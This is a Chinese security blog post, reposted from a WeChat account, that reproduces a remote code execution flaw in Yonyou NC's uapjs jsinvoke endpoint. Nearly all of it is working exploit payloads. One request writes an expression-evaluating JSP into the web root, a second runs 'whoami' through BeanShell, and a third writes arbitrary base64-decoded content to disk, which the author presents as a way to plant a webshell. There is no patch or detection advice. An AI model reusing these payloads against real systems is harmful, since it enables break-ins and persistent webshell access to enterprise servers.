用友NC uapjs RCE漏洞复现(实现文件写入)

admin 2023年10月13日13:52:48评论27 views字数 741阅读2分28秒阅读模式

前段时间某个项目刚好碰到

用友NC uapjs RCE漏洞复现(实现文件写入)

/uapjs/jsinvoke/?action=invoke
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/qq.jsp"]}

然后访问

qq.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())

这是网上大部分的漏洞复现,那么如何写webshell呢,网上有师傅使用的ldap,个人比较懒还是想直接写入文件。

这里直接写入会有问题,<符号会被处理

写webshell如下

qq.jsp?error=bsh.Interpreter&cmd=new FileWriter(System.getProperty("user.dir").concat("/webapps/nc_web/zz2.txt")).append(new String(Base64.getDecoder().decode("SGVsbG8sIFdvcmxkIQ=="))).close();


原文始发于微信公众号(安全学习与分享):用友NC uapjs RCE漏洞复现(实现文件写入)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日13:52:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC uapjs RCE漏洞复现(实现文件写入)http://cn-sec.com/archives/2104699.html

发表评论

匿名网友 填写信息